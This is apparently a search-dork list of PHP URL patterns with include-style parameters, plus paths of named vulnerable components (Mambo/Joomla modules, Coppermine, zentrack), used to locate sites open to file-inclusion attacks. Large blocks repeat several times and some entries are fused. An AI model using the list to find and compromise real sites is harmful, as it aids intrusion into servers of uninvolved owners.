+press.php?addr= +template.php?s= +main.php?tipo= +*inc*.php?ev= +padrao.php?page= +show.php?thispage= +home.php?secao= +main.php?start= +enter.php?mid= +press.php?id= +main.php?inc= +index3.php?cmd= +index.php?pname= +press.php?subject= +include.php?sec= +index3.php?xlink= +general.php?texto= +index3.php?go= +index.php?cmd= +index3.php?disp= +index3.php?left= +sub*.php?middle= +show.php?modo= +index1.php?pagina= +head.php?left= +enter.php?phpbb_root_path= +show.php?z= +start.php?basepath= +blank.php?strona= +template.php?y= +page.php?where= +layout.php?category= +index1.php?my= +principal.php?phpbb_root_path= +nota.php?channel= +page.php?choix= +start.php?xlink= +home.php?k= +standard.php?phpbb_root_path= +principal.php?middlePart= +mod*.php?m= +index.php?recipe= +template.php?path= +pagina.php?dir= +sitio.php?abre= +index1.php?recipe= +blank.php?page= +sub*.php?category= +*inc*.php?bOdy= +enter.php?middle= +home.php?path= +down*.php?pre= +base.php?w= +main.php?path= +nota.php?ir= +press.php?link= +gery.php?pollname= +down*.php?open= +down*.php?pageweb= +default.php?eval= +view.php?showpage= +show.php?get= +sitio.php?tipo= +layout.php?cont= +default.php?destino= +padrao.php?seccion= +down*.php?r= +main.php?param= +standard.php?e= +down*.php?in= +nota.php?include= +sitio.php?secao= +print.php?my= +general.php?abre= +general.php?link= +default.php?id= +standard.php?panel= +show.php?channel= +enter.php?r= +index3.php?phpbb_root_path= +gery.php?where= +head.php?middle= +sub*.php?load= +gery.php?sp= +show.php?chapter= +sub*.php?b= +general.php?adresa= +print.php?goto= +sub*.php?sp= +template.php?doshow= +padrao.php?base_dir= +index2.php?my= +include.php?w= +start.php?op= +main.php?section= +view.php?header= +layout.php?menue= +head.php?y= +sub*.php?content= +show.php?type= +base.php?id= +mod*.php?qry= +default.php?strona= +sitio.php?chapter= +gery.php?index= +nota.php?h= +page.php?oldal= +enter.php?panel= +blank.php?t= +start.php?pollname= +sub*.php?module= +enter.php?thispage= +mod*.php?index= +sitio.php?r= +sub*.php?play= +index2.php?doshow= +index2.php?chapter= +show.php?path= +gery.php?to= +info.php?base_dir= +gery.php?abre= +gery.php?pag= +view.php?channel= +default.php?mod= +index.php?op= +general.php?pre= +padrao.php?type= +template.php?pag= +standard.php?pre= +blank.php?ref= +down*.php?z= +general.php?inc= +home.php?read= +pagina.php?section= +default.php?basepath= +index.php?pre= +sitio.php?pageweb= +base.php?seite= +*inc*.php?j= +index2.php?filepath= +file.php?type= +index1.php?oldal= +index2.php?second= +index3.php?sekce= +info.php?filepath= +base.php?opcion= +path.php?category= +index3.php?start= +start.php?rub= +*inc*.php?i= +blank.php?pre= +general.php?channel= +index2.php?OpenPage= +page.php?section= +mod*.php?middle= +index1.php?goFile= +blank.php?action= +principal.php?loader= +sub*.php?op= +main.php?addr= +start.php?mid= +gery.php?secao= +pagina.php?tipo= +index.php?w= +head.php?where= +principal.php?tipo= +press.php?loader= +gery.php?showpage= +gery.php?go= +enter.php?start= +press.php?lang= +general.php?p= +index.php?sekce= +index2.php?get= +sitio.php?go= +include.php?cont= +sub*.php?where= +index3.php?index= +path.php?recipe= +info.php?loader= +print.php?sp= +page.php?phpbb_root_path= +path.php?bOdy= +principal.php?menue= +print.php?cont= +pagina.php?z= +default.php?mid= +blank.php?xlink= + +sub*.php?oldal= +general.php?b= +include.php?left= +print.php?sivu= +press.php?OpenPage= +default.php?cont= +general.php?pollname= +template.php?nivel= +enter.php?page= +file.php?middle= +standard.php?str= +gery.php?get= +main.php?v= +down*.php?subject= +enter.php?sivu= +path.php?option= +index.php?strona= +index1.php?choix= +index2.php?f= +press.php?destino= +pagina.php?channel= +principal.php?b= +home.php?include= +head.php?numero= +general.php?ref= +main.php?dir= +gery.php?cont= +principal.php?type= +file.php?param= +default.php?secao= +path.php?pageweb= +info.php?r= +base.php?phpbb_root_path= +main.php?itemnav= +view.php?pg= +pagina.php?choix= +default.php?itemnav= +index2.php?cmd= +layout.php?url= +index.php?path= +index1.php?second= +start.php?modo= +index1.php?get= +index3.php?my= +sub*.php?left= +print.php?inc= +view.php?type= +path.php?*[*]*= +base.php?adresa= +index3.php?oldal= +standard.php?bOdy= +base.php?path= +principal.php?strona= +info.php?l= +template.php?left= +head.php?loc= +page.php?ir= +print.php?path= +down*.php?path= +sitio.php?opcion= +pagina.php?category= +press.php?menu= +index2.php?pref= +sitio.php?incl= +show.php?ki= +index3.php?x= +page.php?strona= +*inc*.php?open= +index3.php?secao= +standard.php?*[*]*= +template.php?basepath= +standard.php?goFile= +index2.php?ir= +file.php?modo= +gery.php?itemnav= +main.php?oldal= +down*.php?showpage= +start.php?destino= +blank.php?rub= +path.php?ir= +layout.php?var= +index1.php?texto= +start.php?pg= +index1.php?showpage= +info.php?go= +path.php?load= +index3.php?abre= +blank.php?where= +info.php?start= +page.php?secao= +nota.php?pag= +nota.php?second= +index2.php?to= +standard.php?name= +start.php?strona= +mod*.php?numero= +press.php?home= +info.php?z= +mod*.php?path= +blank.php?base_dir= +base.php?texto= +nota.php?secc= +index.php?tipo= +index.php?goto= +print.php?pag= +view.php?secao= +general.php?strona= +show.php?my= +page.php?e= +padrao.php?index= +gery.php?thispage= +start.php?base_dir= +default.php?tipo= +gery.php?panel= +standard.php?ev= +standard.php?destino= +general.php?middle= +main.php?basepath= +standard.php?q= +index1.php?tipo= +mod*.php?choix= +template.php?ir= +show.php?adresa= +general.php?mid= +index3.php?adresa= +pagina.php?sec= +template.php?secao= +home.php?w= +general.php?content= +sub*.php?recipe= +main.php?category= +enter.php?viewpage= +main.php?ir= +show.php?pageweb= +principal.php?ir= +default.php?pageweb= +index.php?oldal= +head.php?d= +gery.php?mid= +index.php?type= +standard.php?j= +show.php?oldal= +enter.php?link= +enter.php?content= +blank.php?filepath= +standard.php?channel= +base.php?*[*]*= +info.php?incl= +down*.php?include= +press.php?modo= +file.php?choix= +press.php?type= +blank.php?goto= +index3.php?showpage= +principal.php?subject= +start.php?chapter= +show.php?r= +pagina.php?thispage= +general.php?chapter= +page.php?base_dir= +page.php?qry= +show.php?incl= +page.php?*[*]*= +main.php?h= +file.php?seccion= +default.php?pre= +principal.php?index= +principal.php?inc= +home.php?z= +pagina.php?in= +show.php?play= +nota.php?subject= +default.php?secc= +default.php?loader= +padrao.php?var= +mod*.php?b= +default.php?showpage= +press.php?channel= +pagina.php?ev= +sitio.php?name= +page.php?option= +press.php?mid= +down*.php?corpo= +view.php?get= +print.php?thispage= +principal.php?home= +show.php?param= +standard.php?sivu= +index3.php?panel= +include.php?play= +path.php?cmd= +file.php?sp= +template.php?section= +view.php?str= +blank.php?left= +nota.php?lang= +path.php?sivu= +main.php?e= +default.php?ref= +start.php?seite= +default.php?inc= +print.php?disp= +home.php?h= +principal.php?loc= +index3.php?sp= +gery.php?var= +sub*.php?base_dir= +path.php?middle= +pagina.php?str= +base.php?play= +base.php?v= +sitio.php?sivu= +main.php?r= +file.php?nivel= +start.php?sivu= +template.php?c= +general.php?second= +sub*.php?mod= +home.php?loc= +head.php?corpo= +standard.php?op= +index2.php?inc= +info.php?pref= +base.php?basepath= +print.php?basepath= +*inc*.php?m= +base.php?home= +layout.php?strona= +padrao.php?url= +sitio.php?oldal= +pagina.php?read= +index1.php?go= +standard.php?s= +page.php?eval= +index.php?j= +pagina.php?pr= +start.php?secao= +template.php?*[*]*= +nota.php?get= +index3.php?link= +home.php?e= +gery.php?name= +nota.php?eval= +sub*.php?abre= +index2.php?load= +principal.php?in= +view.php?load= +mod*.php?action= +default.php?p= +head.php?c= +template.php?viewpage= +view.php?mid= +padrao.php?addr= +view.php?go= +file.php?basepath= +home.php?pre= +include.php?goFile= +layout.php?play= +index1.php?subject= +info.php?middlePart= +down*.php?pg= +sub*.php?bOdy= +index.php?option= +sub*.php?chapter= +default.php?t= +head.php?opcion= +nota.php?panel= +sitio.php?left= +show.php?include= +pagina.php?start= +head.php?choix= +index3.php?tipo= +index3.php?choix= +down*.php?channel= +base.php?pa= +nota.php?sekce= +show.php?l= +show.php?index= +blank.php?url= +start.php?thispage= +nota.php?play= +show.php?second= +enter.php?include= +principal.php?middle= +main.php?where= +padrao.php?link= +path.php?strona= +index3.php?read= +mod*.php?module= +standard.php?viewpage= +standard.php?pr= +*inc*.php?showpage= +pagina.php?ref= +path.php?pname= +padrao.php?mid= +info.php?eval= +include.php?path= +page.php?subject= +sub*.php?qry= +head.php?module= +nota.php?opcion= +head.php?abre= +base.php?str= +home.php?bOdy= +gery.php?module= +head.php?sivu= +page.php?inc= +pagina.php?header= +mod*.php?v= +home.php?doshow= +padrao.php?n= +index1.php?chapter= +padrao.php?basepath= +index.php?r= +index3.php?seccion= +sitio.php?mid= +index.php?where= +general.php?type= + +pagina.php?goto= +page.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php + +path_of_cpcommerce/_functions.php?prefixpage.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php +path_of_cpcommerce/_functions.php?prefixpage.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php +path_of_cpcommerce/_functions.php?prefixpage.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= +start.php?tipo= +standard.php?w= +index.php?open= +blank.php?menu= +general.php?nivel= +padrao.php?nivel= +*inc*.php?addr= +index.php?var= +home.php?redirect= +*inc*.php?link= +*inc*.php?incl= +padrao.php?corpo= +down*.php?url= +enter.php?goto= +down*.php?addr= +sub*.php?j= +principal.php?f= +sub*.php?menue= +index2.php?section= +general.php?my= +head.php?loader= +general.php?goto= +include.php?dir= +start.php?header= +blank.php?in= +base.php?name= +nota.php?goFile= +head.php?base_dir= +mod*.php?recipe= +press.php?pr= +padrao.php?*[*]*= +layout.php?opcion= +print.php?rub= +index.php?pr= +general.php?seite= +pagina.php?numero= +*inc*.php?pg= +nota.php?rub= +view.php?seite= +pagina.php?recipe= +index.php?pref= +page.php?action= +page.php?ev= +show.php?ir= +head.php?index= +mod*.php?pname= +view.php?ir= +*inc*.php?start= +principal.php?rub= +principal.php?corpo= +padrao.php?middle= +base.php?pname= +template.php?header= +view.php?sp= +main.php?name= +nota.php?m= +blank.php?open= +head.php?dir= +page.php?pname= +*inc*.php?k= +index.php?pollname= +head.php?oldal= +index1.php?str= +template.php?choix= +down*.php?pollname= +page.php?recipe= +template.php?corpo= +nota.php?sec= +info.php?*[*]*= +sub*.php?*[*]*= +page.php?q= +index1.php?type= +gery.php?y= +standard.php?lang= +gery.php?page= +index.php?action= +press.php?pname= +down*.php?v= +index3.php?second= +show.php?recipe= +main.php?pre= +file.php?numero= +print.php?str= +standard.php?link= +nota.php?OpenPage= +view.php?pollname= +print.php?l= +index.php?go= +standard.php?numero= +view.php?pr= +down*.php?read= +down*.php?action= +index1.php?OpenPage= +principal.php?left= +mod*.php?start= +file.php?bOdy= +gery.php?pg= +blank.php?qry= +base.php?eval= +default.php?left= +gery.php?param= +blank.php?pa= +nota.php?b= +path.php?loader= +start.php?o= +include.php?include= +nota.php?corpo= +enter.php?second= +sub*.php?pname= +mod*.php?pageweb= +principal.php?addr= +standard.php?action= +template.php?lang= +include.php?basepath= +sub*.php?ir= +down*.php?nivel= +path.php?opcion= +print.php?category= +print.php?menu= +layout.php?secao= +template.php?param= +standard.php?ref= +base.php?include= +blank.php?bOdy= +path.php?pref= +print.php?g= +padrao.php?subject= +nota.php?modo= +index3.php?loader= +template.php?seite= +general.php?pageweb= +index2.php?param= +path.php?nivel= +page.php?pref= +press.php?pref= +enter.php?ev= +standard.php?middle= +index2.php?recipe= +blank.php?dir= +home.php?pageweb= +view.php?panel= +down*.php?home= +head.php?ir= +mod*.php?ir= +show.php?pagina= +default.php?base_dir= +show.php?loader= +path.php?mid= +blank.php?abre= +down*.php?choix= +info.php?opcion= +page.php?loader= +principal.php?oldal= +index1.php?load= +home.php?content= +pagina.php?sekce= +file.php?n= +include.php?redirect= +print.php?itemnav= +enter.php?index= +print.php?middle= +sitio.php?goFile= +head.php?include= +enter.php?e= +index.php?play= +enter.php?id= +view.php?mod= +show.php?nivel= +file.php?channel= +layout.php?choix= +info.php?bOdy= +include.php?go= +index3.php?nivel= +sub*.php?include= +path.php?numero= +principal.php?header= +main.php?opcion= +enter.php?s= +sub*.php?pre= +include.php?index= +gery.php?pageweb= +padrao.php?path= +info.php?url= +press.php?ev= +index1.php?pg= +print.php?in= +general.php?modo= +head.php?ki= +press.php?my= +index1.php?pollname= +principal.php?to= +default.php?play= +page.php?g= +nota.php?pg= +blank.php?destino= +blank.php?z= +components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= +module_db.php?pivot_path= module_db.php?pivot_path=” +/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=” +components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= +com_extended_registration +smarty_config.php?root_dir= “smarty” +include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr +send_reminders.php?includedir= “send_reminders.php?includedir=” +components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery +inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php +/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg” +[Script Path]/admin/index.php?o= admin/index.php”; +/admin/index.php?o= admin/index.php”; +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar +admin/doeditconfig.php?thispath=../includes&config[path]= “admin” +/components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +components/com_simpleboard/image_upload.php?sbp= com_simpleboard” +/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine +mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= +zentrack/index.php?configFile= +inst/index.php?lng=../../include/main.inc&G_PATH= +pivot/modules/module_db.php?pivot_path= +include/write.php?dir= +includes/header.php?systempath= +becommunity/community/index.php?pageurl= +agendax/addevent.inc.php?agendax_path= +myPHPCalendar/admin.php?cal_dir= +yabbse/Sources/Packages.php?sourcedir= +zboard/zboard.php +path_of_cpcommerce/_functions.php?prefixpage.php?pa= +default.php?menue= +main.php?goto= +index1.php?abre= +info.php?seccion= +index2.php?pa= +layout.php?pageweb= +nota.php?disp= +index1.php?bOdy= +default.php?nivel= +show.php?header= +down*.php?pag= 